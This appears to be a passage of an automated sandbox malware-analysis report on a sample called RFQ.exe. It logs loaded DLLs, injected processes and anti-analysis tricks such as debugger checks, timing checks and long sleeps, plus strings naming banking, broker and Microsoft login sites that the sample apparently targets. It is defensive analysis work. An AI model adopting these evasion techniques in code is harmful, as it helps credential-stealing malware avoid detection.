                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: RFQ.exeStatic file information: File size 1338211 > 1048576
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000007.00000003.1469963468.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469615717.000000000301A000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000002.3127273344.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rNgGAKxrFRkFYx.exe, 00000009.00000000.1356331320.0000000000A5E000.00000002.00000001.01000000.00000005.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3128393871.0000000000A5E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000001.00000003.1282585715.0000000004830000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000001.00000003.1280437204.0000000004690000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1329249007.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1327461526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.0000000003600000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3129632807.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1509162066.0000000003707000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3129632807.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1506988926.0000000003554000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RFQ.exe, 00000001.00000003.1282585715.0000000004830000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000001.00000003.1280437204.0000000004690000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1329249007.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1327461526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1506943681.0000000003600000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 0000000B.00000002.3129632807.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1509162066.0000000003707000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3129632807.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1506988926.0000000003554000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 0000000B.00000002.3130867153.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3124155350.0000000003302000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1576072994.00000000027DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1814266241.000000001418C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 0000000B.00000002.3130867153.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3124155350.0000000003302000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1576072994.00000000027DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1814266241.000000001418C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000007.00000003.1469963468.000000000303B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469615717.000000000301A000.00000004.00000020.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000002.3127273344.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0040EBD0 LoadLibraryA,GetProcAddress,1_2_0040EBD0
                Source: RFQ.exeStatic PE information: real checksum: 0xa961f should be: 0x14bb9b
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00416CB5 push ecx; ret 1_2_00416CC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00401ACE push eax; iretd 7_2_00401B68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004061DF push FFFFFF9Bh; retf 7_2_004061E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040AA1D push edi; retf 7_2_0040AA23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00401B40 push eax; iretd 7_2_00401B68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041933F push ss; ret 7_2_00419355
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00405BF7 push FFFFFFE2h; iretd 7_2_00405BFD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00404BB6 push ds; iretd 7_2_00404BB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00403420 push eax; ret 7_2_00403422
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00413CE3 push es; retf 7_2_00413D12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00418F53 push esp; ret 7_2_00419157
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040AF60 push 0000007Bh; iretd 7_2_0040AF62
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036309AD push ecx; mov dword ptr [esp], ecx7_2_036309B6
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038B225F pushad ; ret 11_2_038B27F9
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038B27FA pushad ; ret 11_2_038B27F9
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038E09AD push ecx; mov dword ptr [esp], ecx11_2_038E09B6
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038B283D push eax; iretd 11_2_038B2858
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038B1368 push eax; iretd 11_2_038B1369
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030A27D4 push FFFFFFE2h; iretd 11_2_030A27DA
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030B08C0 push es; retf 11_2_030B08EF
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030C0E6A push esp; retf 11_2_030C0E6B
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030A2DBC push FFFFFF9Bh; retf 11_2_030A2DBE
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030A1793 push ds; iretd 11_2_030A1795
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030A75FA push edi; retf 11_2_030A7600
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030A7B3D push 0000007Bh; iretd 11_2_030A7B3F
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030B5B30 push esp; ret 11_2_030B5D34
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030BB83A push esp; iretd 11_2_030BB85B
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030B5F1C push ss; ret 11_2_030B5F32
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03744360 push ss; retf 11_2_03744366
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03745170 push ss; ret 11_2_0374518C
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03755062 push eax; ret 11_2_03755064
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_0047A330
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00434418
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\RFQ.exeAPI/Special instruction interceptor: Address: 40332BC
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00418F53 rdtsc 7_2_00418F53
                Source: C:\Windows\SysWOW64\net.exeWindow / User API: threadDelayed 9840Jump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-87543
                Source: C:\Users\user\Desktop\RFQ.exeAPI coverage: 3.3 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\net.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\net.exe TID: 7692Thread sleep count: 132 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 7692Thread sleep time: -264000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 7692Thread sleep count: 9840 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 7692Thread sleep time: -19680000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe TID: 7716Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe TID: 7716Thread sleep time: -40500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00452492
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00442886
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_004788BD
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,1_2_004339B6
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,1_2_0045CAFA
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00431A86
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,1_2_0044BD27
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0045DE8F FindFirstFileW,FindClose,1_2_0045DE8F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_0044BF8B
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030BC820 FindFirstFileW,FindNextFileW,FindClose,11_2_030BC820
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,1_2_0040E500
                Source: net.exe, 0000000B.00000002.3124155350.0000000003302000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
                Source: F14431U2a.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: F14431U2a.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: F14431U2a.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: F14431U2a.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: F14431U2a.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: net.exe, 0000000B.00000002.3133131236.0000000008187000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,116964922314
                Source: F14431U2a.11.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: F14431U2a.11.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: F14431U2a.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: net.exe, 0000000B.00000002.3133131236.0000000008187000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20
                Source: F14431U2a.11.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: F14431U2a.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: F14431U2a.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: F14431U2a.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: F14431U2a.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: F14431U2a.11.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: F14431U2a.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: F14431U2a.11.drBinary or memory string: discord.comVMware20,11696492231f
                Source: rNgGAKxrFRkFYx.exe, 0000000C.00000002.3127632599.0000000000810000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: net.exe, 0000000B.00000002.3133131236.0000000008187000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20r
                Source: F14431U2a.11.drBinary or memory string: global block list test formVMware20,11696492231
                Source: F14431U2a.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: F14431U2a.11.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: F14431U2a.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: net.exe, 0000000B.00000002.3133131236.0000000008187000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - NDCDYNVMware20,11696492231z
                Source: F14431U2a.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: F14431U2a.11.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: net.exe, 0000000B.00000002.3133131236.0000000008187000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: look.office.comVMware20,11696492231s
                Source: F14431U2a.11.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: net.exe, 0000000B.00000002.3133131236.0000000008187000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EU WestVMware20,11696492231n
                Source: F14431U2a.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: F14431U2a.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: F14431U2a.11.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: F14431U2a.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: firefox.exe, 0000000E.00000002.1817648177.000002789422C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrrT0P
                Source: F14431U2a.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: F14431U2a.11.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: F14431U2a.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: F14431U2a.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\RFQ.exeAPI call chain: ExitProcess graph end nodegraph_1-86672
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00418F53 rdtsc 7_2_00418F53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00417B93 LdrLoadDll,7_2_00417B93
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0045A370 BlockInput,1_2_0045A370
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,1_2_0040D590
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0040EBD0 LoadLibraryA,GetProcAddress,1_2_0040EBD0
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_04033528 mov eax, dword ptr fs:[00000030h]1_2_04033528
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_04033588 mov eax, dword ptr fs:[00000030h]1_2_04033588
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_04031EB8 mov eax, dword ptr fs:[00000030h]1_2_04031EB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D437C mov eax, dword ptr fs:[00000030h]7_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov eax, dword ptr fs:[00000030h]7_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov eax, dword ptr fs:[00000030h]7_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov eax, dword ptr fs:[00000030h]7_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov ecx, dword ptr fs:[00000030h]7_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov eax, dword ptr fs:[00000030h]7_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov eax, dword ptr fs:[00000030h]7_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FA352 mov eax, dword ptr fs:[00000030h]7_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D8350 mov ecx, dword ptr fs:[00000030h]7_2_036D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A30B mov eax, dword ptr fs:[00000030h]7_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A30B mov eax, dword ptr fs:[00000030h]7_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A30B mov eax, dword ptr fs:[00000030h]7_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362C310 mov ecx, dword ptr fs:[00000030h]7_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03650310 mov ecx, dword ptr fs:[00000030h]7_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h]7_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E3F0 mov eax, dword ptr fs:[00000030h]7_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E3F0 mov eax, dword ptr fs:[00000030h]7_2_0364E3F0
